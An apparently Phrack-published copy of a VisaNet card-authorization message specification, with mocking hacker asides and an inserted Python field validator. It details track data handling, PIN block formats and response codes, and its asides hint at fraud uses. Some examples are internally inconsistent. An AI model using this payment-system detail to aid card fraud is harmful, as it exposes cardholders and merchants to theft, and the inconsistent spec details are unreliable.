4.16  CARDHOLDER IDENTIFICATION CODE

This one-character field contains a code that indicates the method used to
identify the cardholder. Table 4.16 provides a summary of the codes.
TABLE 4.16
Cardholder Identification Codes

ID CODE      IDENTIFICATION METHOD
--------------------------------------------------------------------------------
A            Personal Identification Number-23 byte static key (non-USA) fnord
B            PIN at Automated Dispensing Machine - 32 byte static key
C            Self Svc Limited Amount Terminal (No ID method available)
D            Self-Service Terminal (No ID method available)
E            Automated Gas Pump (No ID method available)
K            Personal Identification Number - 32 byte DUK/PT
N            Customer Address via Address Verification Service (AVS)
S            Personal Identification Number - 32 byte static key
Z            Cardholder Signature - Terminal has a PIN pad
@            Cardholder Signature - No PIN pad available
F-J,L,M,O-R  Reserved for future use
T-Y
--------------------------------------------------------------------------------

4.17  ACCOUNT DATA SOURCE

This field contains a one-character code defined by Visa and generated by the
terminal to indicate the source of the customer data entered in field 4.18.
Table 4.17 provides a summary of codes

TABLE 4.17
Account Data Source Codes

ACCOUNT DATA
SOURCE CODE   ACCOUNT DATA SOURCE CODE DESCRIPTION
--------------------------------------------------------------------------------
A             RESERVED - Bar-code read
B             RESERVED - OCR read
D             Mag-stripe read, Track 2
H             Mag-stripe read, Track 1
Q             RESERVED - Manually keyed, bar-code capable terminal
R             RESERVED - Manually keyed, OCR capable terminal
T             Manually keyed, Track 2 capable
X             Manually keyed, Track 1 capable
@             Manually keyed, terminal has no card reading capability
C,E-G,I-P,S,  RESERVED for future use
U-W,Y-Z,0-9
--------------------------------------------------------------------------------

NOTE:
  - If a dual track reading terminal is being used, be sure to enter the
    correct value of "D" or "H" for the magnetic data that is transmitted
  - When data is manually keyed at a dual track reading terminal, enter
    either a "T" or an "X"

4.18  CUSTOMER DATA FIELD

This is a variable length field containing customer account
or check acceptance ID data in one of three formats. The cardholder account
information can be read from the card or it may be entered manually.
Additionally the terminal can be used for check authorization processing with
the check acceptance identification number entered by the operator for
transmission in this field.

NOTE: For all POS terminals operated under VISA U.S.A. Operating Regulations,
the following requirement must be available as an operating option if the
merchant location is found to be generating a disproportionately high
percentage of Suspect Transactions [lets get downright hostile about it] as
defined in chapter 9.10 of the VISA U.S.A. Operating Regulations.
Specifically, chapter 9.10.B.2 requires that:

  - The terminal must read the track data using a magnetic stripe reading
    terminal
  - The terminal must prompt the wage slave to manually enter the last four
    digits of the account number
  - The terminal must compare the keyed data with the last four digits of the
    account number in the magnetic stripe
  - If the compare is successful, the card is acceptable to continue in the
    authorization process and the terminal must transmit the full, unaltered
    contents of the magnetic stripe in the authorization message.
  - If the compare fails, the card should not be honored at the Point of Sale

4.18.1  TRACK 1 READ DATA

This is a variable length field with a maximum data length of 76 characters.

The track 1 data read from the cardholder's card is checked for parity and
LRC errors and then converted from the six-bit characters encoded on the card
to seven-bit characters as defined in ANSI X3.4. The character set
definitions are provided in section 7 for reference. As part of the
conversion the terminal will strip off the starting sentinel, ending
sentinel, and LRC characters. The separators are to be converted to a "^"
(HEX 5E) character. The entire track must be provided in the request message.
The character set and data content are different between track 1 and track 2.
The data read by a track 2 device can not be correctly reformatted and
presented as though it were read by a track 1 device. [aw shucks] The
converted data can not be modified by adding or deleting non-framing
characters and must be a one-for-one representation of the character read
from the track.

4.18.2  TRACK 2 READ DATA

This is a variable length field with a maximum data length of 37 characters.

The track 2 data read from the cardholder's card is checked for parity and
LRC errors and then converted from the six-bit characters encoded on the card
to seven-bit characters as defined in ANSI X3.4. The character set
definitions are provided in section 7 for reference. As part of the
conversion the terminal will strip off the starting sentinel, ending
sentinel, and LRC characters. The separators are to be converted to a "^"
(HEX 5E) character. The entire track must be provided in the request message.
The character set and data content are different between track 2 and track 1.
The data read by a track 1 device can not be correctly reformatted and
presented as though it were read by a track 2 device. The converted data can
not be modified by adding or deleting non-framing characters and must be a
one-for-one representation of the character read from the track.
[repetitive? you bet]

4.18.3  MANUALLY ENTERED ACCOUNT DATA (CREDIT CARD)

The customer credit card data may be key entered when the card can not be
read, when a card is not present, or when a card reader is not available.

4.18.3.1  MANUALLY ENTERED ACCOUNT NUMBER

This is a variable length field consisting of 5 to 28 alphanumeric
characters. The embossed cardholder data, that is key entered, is validated
by the terminal using rules for each supported card type. For example, both
Visa and Master Card include a mod 10 check digit as the last digit of the
Primary Account Number.
The Primary Account Number (PAN) is encoded as seven-bit characters as
defined in ANSI X3.4. The PAN is then provided in the manually entered record
format provided in Table 3.01b. The PAN must be provided without embedded
spaces.

4.18.3.2  MANUALLY ENTERED EXPIRATION DATE

This four-digit field contains the card expiration date in the form MMYY
(month-month-year-year)

4.18.4  CHECK ACCEPTANCE IDENTIFICATION NUMBER

The customer data may be card read or manually key entered for check
acceptance transactions.

4.18.4.1  CHECK ACCEPTANCE ID

This field is a variable length field consisting of 1 to 28 alphanumeric
characters. The check acceptance vendor will provide the data format and
validation rules to be used by the terminal. Typically the ID consists of a
two-digit state code and an ID which may be the customer's drivers license
number.

4.18.4.2  MANUALLY ENTERED CHECK ACCEPTANCE DATA

This six-character field contains the customer birth date or a control code
in the form specified by the check acceptance processor.

4.19  FIELD SEPARATOR

The authorization record format specifies the use of the "FS" character.

4.20  CARDHOLDER IDENTIFICATION DATA

This field will be 0, 23, 29 or 32 characters in length. The cardholder ID
codes shown in Table 4.16 indicate the type of data in this field. Table 4.20
provides a brief summary of the current formats.

TABLE 4.20 Cardholder Identification Data Definitions

CARDHOLDER                                                    VALUE(S) FROM
ID LENGTH    DESCRIPTION                                      TABLE 4.16
--------------------------------------------------------------------------------
0            Signature ID used, No PIN pad is present         @,C,D or E
0            Signature ID used on a terminal with a PIN pad   Z
23           A PIN was entered on a STATIC key PIN pad        A
32           A PIN was entered on a STATIC key PIN pad        B
32           A PIN was entered on a DUK/PT key PIN pad        K
32           A PIN was entered on a STATIC key PIN pad        S
0 to 29      AVS was requested                                N
--------------------------------------------------------------------------------

4.20.1 STATIC KEY WITH TWENTY THREE BYTE CARDHOLDER ID

NOTE: The 23 byte static key technology is NOT approved for use in terminals
deployed in the Visa U.S.A. region. [thanks nsa!]

When a PIN is entered on a PIN pad supporting 23 byte static key technology,
the terminal will generate the following data:

    1JFxxyyaaaaaaaaaaaaaaaa

Where:

1J - Header - PIN was entered

f - Function Key Indicator - A single byte indicating which, if any, function
key was pressed on the PIN pad. This field is currently not edited. Any
printable character is allowed.

xx - PIN Block Format - These two numeric bytes indicate the PIN encryption
method used to create the encrypted PIN block. Visa currently supports four
methods; 01, 02, 03, & 04. For more information, please refer to the VisaNet
Standards Manual, Card Technology Standards, PIN and Security Standards,
Section 2, Chapter 3, PIN Block Formats

aaaaaaaaaaaaaaaa - Expanded Encrypted PIN Block Data - The encrypted PIN block
format consists of 64 bits of data. Since the VisaNet Second Generation
protocol allows only printable characters in data fields, these 64 bits must
be expanded to ensure that no values less than hex "20" are transmitted. To
expand the 64 bit encrypted PIN block, remove four bits at a time and convert
them to ANSI X3.4 characters using Table 4.20.
After this conversion, the 64 bit encrypted PIN block will consist of 16
characters that will be placed in the Expanded Encrypted PIN Block Data field.

4.20.2 STATIC KEY WITH THIRTY TWO BYTE CARDHOLDER ID

When a PIN is entered on a PIN pad supporting 32 byte static key technology,
the terminal will generate the following data:

    aaaaaaaaaaaaaaaa2001ppzz00000000

Where:

aaaaaaaaaaaaaaaa - Expanded Encrypted PIN Block Data - The encrypted PIN block
format consists of 64 bits of data. Since the VisaNet Second Generation
protocol allows only printable characters in data fields, these 64 bits must
be expanded to ensure that no values less than hex "20" are transmitted. To
expand the 64 bit encrypted PIN block, remove four bits at a time and convert
them to ANSI X3.4 characters using table 4.20. After this conversion, the 64
bit encrypted PIN block will consist of 16 characters that will be placed in
the Expanded Encrypted PIN Block Data field.

20 - Security Format Code - This code defines that the Zone Encryption
security technique was used.

01 - PIN Encryption Algorithm Identifier - This code defines that the ANSI DES
encryption technique was used.

pp - PIN Block Format Code - This code describes the PIN block format used by
the acquirer. Values are:

    01 - Format is based on the PIN, the PIN length, selected rightmost
         digits of the account number and the pad characters "0" and "F";
         combined through an exclusive "OR" operation.
    02 - Format is based on the PIN, the PIN length and a user specified
         numeric pad character.
    03 - Format is based on the PIN and the "F" pad character.
    04 - Format is the same as "01" except that the leftmost account number
         digits are selected.

zz - Zone Key Index - This index points to the zone key used by the acquirer
to encrypt the PIN block. Values are:

    01 - First key
    02 - Second key

00000000 - Visa Reserved - Must be all zeros

For additional information, refer to the VisaNet manual V.I.P.
System, Message Formats, Section B: Field Descriptions. Specifically, fields
52 and 53; Personal Identification Number (PIN) Data and Security Related
Control Information respectively.

4.20.3 DUK/PT KEY WITH THIRTY TWO BYTE CARDHOLDER ID

When a PIN is entered on a PIN pad supporting DUK/PT technology, the terminal
will generate the following 32 bytes:

    aaaaaaaaaaaaaaaakkkkkkssssssssss

Where:

aaaaaaaaaaaaaaaa - Expanded Encrypted PIN Block Data - The encrypted PIN block
format consists of 64 bits of data. Since the VisaNet Second Generation
protocol allows only printable characters in data fields, these 64 bits must
be expanded to ensure that no values less than hex "20" are transmitted. To
expand the 64 bit encrypted PIN block, remove four bits at a time and convert
them to ANSI X3.4 characters using table 4.20. After this conversion, the 64
bit encrypted PIN block will consist of 16 characters that will be placed in
the Expanded Encrypted PIN Block Data field. [repetitive? you bet]

kkkkkk - Key Set Identifier (KSID) - Is represented by a unique, Visa
assigned, six digit bank identification number.

ssssssssss - Expanded TRSM ID (PIN Pad Serial Number) & Expanded Transaction
Counter - Is represented by the concatenation of these two hexadecimal fields.
The PIN pad serial number is stored as five hex digits minus one bit for a
total of 19 bits of data. The transaction counter is stored as five hex digits
plus one bit for a total of 21 bits of data. These two fields concatenated
together will contain 40 bits. Since the VisaNet Second Generation protocol
allows only printable characters in data fields, these 40 bits must be
expanded to ensure that no values less than hex "20" are transmitted. To
expand this 40 bit field, remove four bits at a time and convert them to ASCII
characters using table 4.20. After this conversion, this 40 bit field will
consist of 10 characters that will be placed in the Expanded TRSM ID &
Expanded Transaction Counter Field.
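
The three PIN layouts of section 4.20 and the four-bit expansion they share, as an added Python example that is not part of the VisaNet document or of this article. It validates a Cardholder Identification Data field against its Table 4.16 code; function and key names are hypothetical, and the "yy" bytes of the 23-byte layout, which the text does not describe, are passed through unchecked.

```python
"""Validate and split the Cardholder Identification Data field (section 4.20).

Added example. Layouts and code letters come from the text above; every
function and dictionary key name is hypothetical.
"""

HEX_CHARS = "0123456789ABCDEF"      # right-hand column of the conversion table
PIN_BLOCK_FORMATS = ("01", "02", "03", "04")


def expand(raw):
    """Expand binary data four bits at a time into printable characters."""
    return "".join(HEX_CHARS[n] for b in raw for n in (b >> 4, b & 0x0F))


def collapse(text):
    """Reverse expand(); reject any character outside the conversion table."""
    if len(text) % 2 or not set(text) <= set(HEX_CHARS):
        raise ValueError("not an expanded field: %r" % text)
    return bytes.fromhex(text)


def parse_cardholder_id(code, field):
    """code: Cardholder ID code from Table 4.16; field: the data as received."""
    if code in ("@", "C", "D", "E", "Z"):       # signature, zero-length field
        if field:
            raise ValueError("signature ID codes carry no cardholder ID data")
        return {"type": "signature"}
    if code == "N":                             # AVS, 0 to 29 characters
        if len(field) > 29:
            raise ValueError("AVS data is limited to 29 characters")
        return {"type": "avs", "address": field}
    if code == "A":                             # 1J f xx yy + 16 characters
        if len(field) != 23 or field[:2] != "1J":
            raise ValueError("bad 23-byte static key field")
        if field[3:5] not in PIN_BLOCK_FORMATS:
            raise ValueError("unsupported PIN block format")
        return {"type": "static-23",
                "function_key": field[2],       # not edited: any printable
                "pin_block_format": field[3:5],
                "yy": field[5:7],               # undocumented, passed through
                "pin_block": collapse(field[7:])}
    if len(field) != 32:
        raise ValueError("expected a 32-byte field for code %r" % code)
    pin_block = collapse(field[:16])
    if code in ("B", "S"):                      # a(16) 20 01 pp zz 00000000
        if field[16:20] != "2001":
            raise ValueError("security format/algorithm must be 20 and 01")
        if field[20:22] not in PIN_BLOCK_FORMATS:
            raise ValueError("unsupported PIN block format")
        if field[22:24] not in ("01", "02"):
            raise ValueError("zone key index must be 01 or 02")
        if field[24:] != "00000000":
            raise ValueError("Visa reserved bytes must be all zeros")
        return {"type": "static-32",
                "pin_block": pin_block,
                "pin_block_format": field[20:22],
                "zone_key_index": field[22:24]}
    if code == "K":                             # a(16) k(6) s(10)
        ksid = field[16:22]
        if not all(ch in "0123456789" for ch in ksid):
            raise ValueError("KSID must be six digits")
        packed = int.from_bytes(collapse(field[22:]), "big")   # 40 bits
        return {"type": "dukpt",
                "pin_block": pin_block,
                "ksid": ksid,
                "pin_pad_serial": packed >> 21,            # upper 19 bits
                "transaction_counter": packed & 0x1FFFFF}  # lower 21 bits
    raise ValueError("unknown cardholder ID code %r" % code)
```

The encrypted PIN block is only carried as opaque bytes here; nothing in the field lets the terminal side decrypt it.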

TABLE 4.20 PIN Block conversion Table

 HEXADECIMAL  |  ANSI X3.4
    DATA      |  CHARACTER
--------------+----------------
    0000      |      0
    0001      |      1
    0010      |      2
    0011      |      3
    0100      |      4
    0101      |      5
    0110      |      6
    0111      |      7
    1000      |      8
    1001      |      9
    1010      |      A
    1011      |      B
    1100      |      C
    1101      |      D
    1110      |      E
    1111      |      F
-------------------------------

4.20.4 ADDRESS VERIFICATION SERVICE DESCRIPTION [ah enlightenment]

When Address Verification Service is requested, this field will contain the
mailing address of the cardholder's monthly statement. The format of this
field is: or

Numbers are not spelled out. ("First Street" becomes "1ST Street", "Second"
becomes "2ND", etc) "Spaces" are only required between a numeral and the ZIP
code. For instance:

    1391 ELM STREET 40404

is equivalent to:

    1931ELMSTREET40404

    P.O. Box 24356 55555

is not equivalent to

    P.O.BOX2435655555

If a field is not available or not applicable, it may be skipped. If nine
digits are available, the last five digits should always be used to pour more
sand into the wheels of progress.

4.21 FIELD SEPARATOR

The authorization record format specifies the use of the "FS" character.

==Phrack Magazine==

Volume Five, Issue Forty-Six, File 16 of 28

****************************************************************************

VisaNet Operations (Continued)

4.22 TRANSACTION AMOUNT

This is a variable field from three to twelve digits in length. The
transaction amount includes the amount in 4.28, Secondary Amount. Therefore,
field 4.22 must be greater than or equal to field 4.28.

The transaction amount is presented by the terminal with an implied decimal
point. For example $.01 would be represented in the record as "001". When the
terminal is used with an authorization system which supports the US dollar as
the primary currency, the amount field must be limited to seven digits
(9999999). [...] The terminal may be used with authorization systems which
support other currencies that require the full twelve-digit field.

4.23 FIELD SEPARATOR

The authorization record format specifies the use of the "FS" character.

4.24 DEVICE CODE/INDUSTRY CODE

This field is used to identify the device type which generated the
transaction and the industry type of the merchant. Table 4.24 provides a
brief summary of the current codes.

TABLE 4.24 Device Code/Industry Code

CODE  DEVICE TYPE                       CODE  INDUSTRY TYPE
-------------------------------------------------------------------------------
0     Unknown or Unsure                 0     Unknown or Unsure
1     RESERVED                          1     RESERVED
2     RESERVED                          2     RESERVED
3     RESERVED                          3     RESERVED
4     RESERVED                          4     RESERVED
5     RESERVED                          5     RESERVED
6     RESERVED                          6     RESERVED
7     RESERVED                          7     RESERVED
8     RESERVED                          8     RESERVED
9     RESERVED                          9     RESERVED
A     RESERVED                          A     RESERVED
B     RESERVED                          B     Bank/Financial Institution
C     P.C.                              C     RESERVED
D     Dial Terminal                     D     RESERVED
E     Electronic Cash Register (ECR)    E     RESERVED
F     RESERVED                          F     Food/Restaurant
G     RESERVED                          G     Grocery Store/Supermarket
H     RESERVED                          H     Hotel
I     In-Store Processor                I     RESERVED
J     RESERVED                          J     RESERVED
K     RESERVED                          K     RESERVED
L     RESERVED                          L     RESERVED
M     Main Frame                        M     Mail Order
N     RESERVED                          N     RESERVED
O     RESERVED                          O     RESERVED
P     POS-port                          P     RESERVED
Q     RESERVED for POS-port             Q     RESERVED
R     RESERVED                          R     Retail
S     RESERVED                          S     RESERVED
T     RESERVED                          T     RESERVED
U     RESERVED                          U     RESERVED
V     RESERVED                          V     RESERVED
W     RESERVED                          W     RESERVED
X     RESERVED                          X     RESERVED
Y     RESERVED                          Y     RESERVED
Z     RESERVED                          Z     RESERVED
--------------------------------------------------------------------------------

4.25 FIELD SEPARATOR

The authorization record format specifies the use of the "FS" character.

4.26 ISSUING INSTITUTION ID/RECEIVING INSTITUTION ID

This six-digit field is provided by the merchant signing member and is
present when the terminal is used to process transactions which can not be
routed using the cardholder Primary Account Number. When a value is present
in this field, it is used as an RIID for all valid transaction codes, field
4.12, except 81 through 88. This field is used as an IIID for transaction
codes 81 through 88.
Table 4.26 provides a summary of the RIID codes for check acceptance.

TABLE 4.26 Check Acceptance RIID Values

Vendor               RIID
---------------------------
JBS, Inc             810000
Telecheck            861400
TeleCredit, West     894300
TeleCredit, East     894400
---------------------------

[note; telecredit has been mutated/eaten by equifax]

4.27 FIELD SEPARATOR

The authorization record format specifies the use of the "FS" character.

4.28 SECONDARY AMOUNT (CASHBACK)

NOTE: "Cashback" is NOT allowed on Visa cards when the Customer Data Field,
see section 4.18, has been manually entered.

This is a variable length field from three to twelve digits in length. The
Secondary Amount is included in field 4.22, Transaction Amount.

The secondary amount is presented by the terminal with an implied decimal
point. For example $.01 would be represented in the record as "001". This
field will contain 000 when no secondary amount has been requested.
Therefore, when the terminal is used with an authorization system which
supports the US dollar as the primary currency, the secondary amount field
must be limited to seven digits (9999999). The terminal may be used with
authorization systems which support other currencies that require the full
twelve-digit field.

4.29 FIELD SEPARATOR

The authorization record format specifies the use of the "FS" character.

4.30 MERCHANT NAME

This 25-character field contains the merchant name provided by the signing
member. The name must correspond to the name printed on the customer receipt.
The name is left justified with space fill. The first character position can
not be a space. This field must contain the same data used in the data
capture batch.

4.32 MERCHANT STATE

This two-character field contains the merchant location state abbreviation
provided by the signing member. The abbreviation must correspond to the state
name printed on the customer receipt and be one of the Visa accepted
abbreviations. This field must contain the same data used in the data capture
batch.

4.33 SHARING GROUP

This one to fourteen-character field contains the group of debit card/network
types that a terminal may have access to and is provided by the signing
member. The values must correspond to one of the Visa assigned debit
card/network types. This data is part of the VisaNet debit data.

4.34 FIELD SEPARATOR

The authorization record format specifies the use of the "FS" character.

4.35 MERCHANT ABA NUMBER

This fixed length field is twelve digits in length. If this field is not
used, its length must be zero. If this field is not used, the following field
must also be empty. This number identifies the merchant to a debit switch
provided by the signing member. The number is provided by the signing member.

4.36 MERCHANT SETTLEMENT AGENT NUMBER

This fixed length field is four digits in length. If this field is not used,
its length must be zero. If this field is not used, the previous field must
also be empty. This number identifies the merchant settling agent. The number
is provided by the signing member.

4.37 FIELD SEPARATOR

The authorization record format specifies the use of the "FS" character.

4.38 AGENT NUMBER

This six-digit field contains an agent number assigned by the signing member.
The number identifies an institution which signs merchants as an agent of a
member. The member uses this number to identify the agent within the member
systems. The acquirer BIN, Agent, Chain, Merchant, Store, and Terminal
numbers are required to uniquely identify a terminal within the VisaNet
systems.

4.39 CHAIN NUMBER

This six-digit field contains a merchant chain identification number assigned
by the signing member. The member uses this number to identify the merchant
chain within the member systems. The acquirer BIN, Agent, Chain, Merchant,
Store, and Terminal numbers are required to uniquely identify a terminal
within the VisaNet systems.

4.40 BATCH NUMBER

This three-digit field contains a batch sequence number generated by the
terminal.
The number will wrap from 999 to 001. This number is the data capture batch
number.

4.41 REIMBURSEMENT ATTRIBUTE

This is a single character fixed length field. This field contains the
reimbursement attribute assigned by the signing member. This field must be a
"space".

4.42 FIELD SEPARATOR

The authorization record format specifies the use of the "FS" character.

4.43 APPROVAL CODE

This contains a six-character fixed length field. This field is only present
in cancel transactions and contains the original approval code from the
original transaction. The approval code was returned in the authorization
response of the transaction to be canceled.

4.44 SETTLEMENT DATE

This contains a four-digit fixed length field. This field is only present in
cancel transactions and contains the settlement date from the original
transaction and is in the format MMDD. The settlement date was returned in
the authorization response of the transaction to be canceled.

4.45 LOCAL TRANSACTION DATE

This contains a four-digit fixed length field. This field is only present in
cancel transactions and contains the transaction date from the original
transaction and is in the format MMDD. The transaction date was returned in
the authorization response of the transaction to be canceled as MMDDYY.

4.46 LOCAL TRANSACTION TIME

This contains a six-digit fixed length field. This field is only present in
cancel transactions and contains the transaction time from the original
transaction and is in the format HHMMSS. The transaction time was returned in
the authorization response of the transaction to be canceled.

4.47 SYSTEM TRACE AUDIT NUMBER

This contains a six-character fixed length field. This field is only present
in cancel transactions and contains the trace audit number from the original
transaction. The trace audit number was returned in the authorization
response of the transaction to be canceled.

4.48 ORIGINAL AUTHORIZATION TRANSACTION CODE

The field is a two-character fixed length field and must contain the original
AUTHORIZATION TRANSACTION CODE (field 4.12) of the transaction to be
canceled. Currently, the only transaction that can be canceled is an
Interlink Debit Purchase.

4.49 NETWORK IDENTIFICATION CODE

This contains a single character fixed length field. This field is only
present in cancel transactions and contains the network ID from the original
transaction. The network ID was returned in the authorization response of the
transaction to be canceled.

4.50 FIELD SEPARATOR

The authorization record format specifies the use of the "FS" character.

5.0 RESPONSE RECORD DATA ELEMENT DEFINITIONS

The following subsections will define the authorization response record data
elements.

5.01 PAYMENT SERVICE INDICATOR

This field contains the one-character payment service indicator. It must be
placed in the batch detail record for terminals that capture. Table 5.01
provides a summary of current Values.

TABLE 5.01 Payment Service Indicator Values

VALUE   DESCRIPTION
------------------------------------------------------------------
A       REPS qualified
Y       Requested a "Y" in field 4.14 and there was a problem
        REPS denied (VAS edit error or BASE I reject)
N       Requested an "N" in field 4.14 or requested a "Y" in
        field 4.14 and request was downgraded (by VAS)
space   If "Y" sent and transaction not qualified (VAS downgrade)
------------------------------------------------------------------

5.02 STORE NUMBER

This four-digit number is returned by VisaNet from the authorization request
for formats "J" and "G", and can be used to route the response within a store
controller and/or a store concentrator.

5.03 TERMINAL NUMBER

This four-digit number is returned by VisaNet from the authorization request
for formats "J" and "G", and can be used to route the response within a store
controller and/or a store concentrator.

5.04 AUTHORIZATION SOURCE CODE

This field contains a one-character code that indicates the source of the
authorization. The received code must be placed in the data capture detail
transaction record when data capture is enabled. Table 5.04 provides a
summary of current codes.

TABLE 5.04 Authorization Source Codes

Code  Description
--------------------------------------------------------------------------------
1     STIP: time-out response
2     LCS: amount below issuer limit
3     STIP: issuer in Suppress-Inquiry mode
4     STIP: issuer unavailable
5     Issuer approval
6     Off-line approval, POS device generated
7     Acquirer approval: BASE I unavailable
8     Acquirer approval of a referral
9     Use for non-authorized transactions; such as credit card credits [yum!]
D     Referral: authorization code manually keyed
E     Off-line approval: authorization code manually keyed
--------------------------------------------------------------------------------

5.05 TRANSACTION SEQUENCE NUMBER

This field contains the four-digit code which was generated by the terminal
as the sequence number for the transaction and passed to the authorization
center in the authorization request record. The sequence number can be used
by the terminal to match request and response messages. The transaction
sequence number is returned by VisaNet without sequence verification.

5.06 RESPONSE CODE

This field contains a two-character response code indicating the status of
the authorization. Table 5.06 provides the response codes for formats "J" and
"G". A response code of "00" represents an approval. A response code of "85"
represents a successful card verification returned by TRANSACTION CODES 58,
68, and 88. All other response codes represent a non-approved request. The
value returned is stored in the batch transaction detail record for terminals
that capture.

TABLE 5.06 Authorization Response Codes For Record Formats "J" & "G"

Authorization        Response                                       AVS Result
Response Message     Code      Response Definition                  Code
--------------------------------------------------------------------------------
EXACT MATCH          00        Exact Match, 9 digit zip             X
EXACT MATCH          00        Exact Match, 5 digit zip      GRIND  Y
ADDRESS MATCH        00        Address match only                   A
ZIP MATCH            00        9-digit zip match only               W
ZIP MATCH            00        5-digit zip match only        GRIND  Z
NO MATCH             00        No address or zip match              N
VER UNAVAILABLE      00        Address unavailable                  U
RETRY                00        Issuer system unavailable            R
ERROR INELIGIBLE     00        Not a mail/phone order               E
SERV UNAVAILABLE     00        Service not supported                S
APPROVAL             00        Approved and completed               see above
CARD OK              85        No reason to decline                 see above
CALL                 01        Refer to issuer                      0
CALL                 02        Refer to issuer - Special condition  0
NO REPLY             28        File is temporarily unavailable      0
NO REPLY             91        Issuer or switch is unavailable      0
HOLD-CALL            04        Pick up card                         0
HOLD-CALL            07        Pick up card - Special condition     0
HOLD-CALL            41        Pick up card - Lost                  0
HOLD-CALL            43        Pick up card - Stolen                0
ACCT LENGTH ERR      EA        Verification Error                   0
ALREADY REVERSED     79        Already Reversed at Switch           0
                               [ya got me]
AMOUNT ERROR         13        Invalid amount                       0
CAN'T VERIFY PIN     83        Can not verify PIN                   0
CARD NO ERROR        14        Invalid card number                  0
CASHBACK NOT APP     82        Cashback amount not approved         0
CHECK DIGIT ERR      EB        Verification Error                   0
CID FORMAT ERROR     EC        Verification Error                   0
DATE ERROR           80        Invalid Date                         0
DECLINE              05        Do not honor                         0
DECLINE              51        Not Sufficient Funds                 0
DECLINE              61        Exceeds Withdrawal Limit             0
DECLINE              65        Activity Limit Exceeded              0
ENCRYPTION ERROR     81        Cryptographic Error                  0
ERROR xx             06        General Error                        0
ERROR xxxx           06        General Error                        0
EXPIRED CARD         54        Expired Card                         0
INVALID ROUTING      98        Destination Not Found                0
INVALID TRANS        12        Invalid Transaction                  0
NO CHECK ACCOUNT     52        No Check Account                     0
NO SAVE ACCOUNT      54        No Save Account                      0
NO SUCH ISSUER       15        No Such Issuer                       0
RE ENTER             19        Re-enter Transaction                 0
SEC VIOLATION        63        Security Violation                   0
SERV NOT ALLOWED     57        Trans. not permitted-Card            0
SERV NOT ALLOWED     58        Trans. not permitted-Terminal        0
SERVICE CODE ERR     62        Restricted Card                      0
SYSTEM ERROR         96        System Malfunction                   0
                               [whoop whoop!]
TERM ID ERROR        03        Invalid Merchant ID                  0
WRONG PIN            55        Incorrect PIN                        0
xxxxxxxxxxxxxxxxxx   xx        Undefined Response                   0
--------------------------------------------------------------------------------

5.07 APPROVAL CODE

This field contains a six-character code when a transaction has been
approved. If the transaction is not approved the contents of the field should
be ignored. The approval code is input to the data capture detail transaction
record.

5.08 LOCAL TRANSACTION DATE

This field contains a six-digit local date calculated (MMDDYY) by the
authorization center using the time zone differential code provided in the
authorization request message. This date is used by the terminal as the date
to be printed on the transaction receipts and audit reports, and as the date
input to the data capture transaction detail record. This field is only valid
for approved transactions.

5.09 AUTHORIZATION RESPONSE MESSAGE

This field is a sixteen-character field containing a response display
message. This message is used by the terminal to display the authorization
results. Table 5.06 provides the message summary. The messages are provided
with "sp" space fill. This field is mapped to the RESPONSE CODE, field 5.06,
for all non-AVS transactions and for all DECLINED AVS transactions. For
APPROVED AVS transactions (response code = "00" or "85"), it is mapped to the
AVS RESULT CODE, field 5.10.

5.10 AVS RESULT CODE

This one-character field contains the address verification result code. An
address verification result code is provided for transactions and provides an
additional indication that the card is being used by the person to which the
card was issued. The service is only available for mail/phone order
transactions. Table 5.06 provides a summary of the AVS Result Codes.
An ANSI X3.4 "0" is provided for all non-AVS transactions and all declined
transactions.

5.11 TRANSACTION IDENTIFIER

This numeric field will contain a transaction identifier. The identifier will
be fifteen-digits in length if the payment service indicator value is an "A"
or it will be zero in length if the payment service indicator value is not an
"A". This value is stored in the batch detail record for terminals that
capture and is mandatory for REPS qualification.

5.12 FIELD SEPARATOR

The authorization record format specifies the use of the "FS" character.

5.13 VALIDATION CODE

This alphanumeric field will contain a validation code. The code will contain
a four-character value if the payment service indicator value is an "A" or it
will be zero in length if the payment service indicator value is not an "A".
This value is stored in the batch detail record for terminals that capture
and is mandatory for REPS qualification.

5.14 FIELD SEPARATOR

The authorization record format specifies the use of the "FS" character.

5.15 NETWORK IDENTIFICATION CODE

This one-character fixed length field contains the identification code of the
network on which the transaction was authorized. The network ID must be
printed on the receipt.

5.16 SETTLEMENT DATE

This four-digit fixed length field contains the transaction settlement date
returned by the authorizing system (MMDD). The settlement date must be
printed on the receipt.

5.17 SYSTEM TRACE AUDIT NUMBER

This six-character fixed length field contains a trace audit number which is
assigned by the authorizing system. The trace audit number must be printed on
the receipt.

5.18 RETRIEVAL REFERENCE NUMBER

This twelve-character fixed length field contains the transaction retrieval
reference number returned by the authorizing system. The reference number
should be printed on the receipt.

5.19 LOCAL TRANSACTION TIME

This six-digit fixed length field contains the transaction time returned by
the authorizing system (HHMMSS).
The time must be printed on the receipt.

6.0 CONFIRMATION RECORD DATA ELEMENT DEFINITIONS

The following subsections define the debit confirmation response record data
elements.

6.01 NETWORK IDENTIFICATION CODE

This one character fixed length field contains the identification code of the
network on which the transaction was authorized. The network ID is printed on
the receipt.

6.02 SETTLEMENT DATE

This four-digit fixed length field contains the transaction settlement date
returned by the authorizing system.

6.03 SYSTEM TRACE AUDIT NUMBER

This six-character fixed length field contains the system trace audit number
which is assigned by the authorizing system.

7.0 CHARACTER CODE DEFINITIONS

The following subsections will define the authorization request record
character set and character sets used for track 1 and track 2 data encoded on
the magnetic stripes.

The authorization request records are generated with characters defined by
ANSI X3.4-1986. The data stored on the cardholder's card in magnetic or
optical form must be converted to the ANSI X3.4 character set before
transmission to VisaNet.

Section 7.01 provides track 1 character set definition. Section 7.02 provides
track 2 character set definition. Section 7.03 provides the ANSI X3.4-1986
and ISO 646 character set definitions. Section 7.04 provides a cross
reference between the track 1, track 2, and ANSI X3.4 character sets. Section
7.05 describes the method for generating and checking the Mod 10 Luhn check
digit for credit card account numbers. Section 7.06 describes the method for
generating the LRC byte for the authorization request message and for testing
the card swipe's LRC byte. Section 7.07 provides sample data for an
authorization request and response for record format "J" testing.

The POS device/authorization must perform the following operations on track
read data before it can be used in an authorization request message.

1. The LRC must be calculated for the data read from the track and compared
   to the LRC read from the track. The track data is assumed to be read
   without errors when no character parity errors are detected and the
   calculated and read LRC's match.

2. The starting sentinel, ending sentinel, and LRC are discarded.

3. The character codes read from the magnetic stripe must be converted from
   the encoded character set to the set used for the authorization request
   message. The characters encoded on track 1 are six-bit plus parity codes
   and the characters encoded on track 2 are four-bit plus parity codes, with
   the character set used for the request message defined as seven-bit plus
   parity codes.

All characters read from a track must be converted to the request message
character set and transmitted as part of the request. The converted track
data can not be modified by adding or deleting non-framing characters and
must be a one-for-one representation of the characters read from the track.
[sounds like they mean it, eh?]

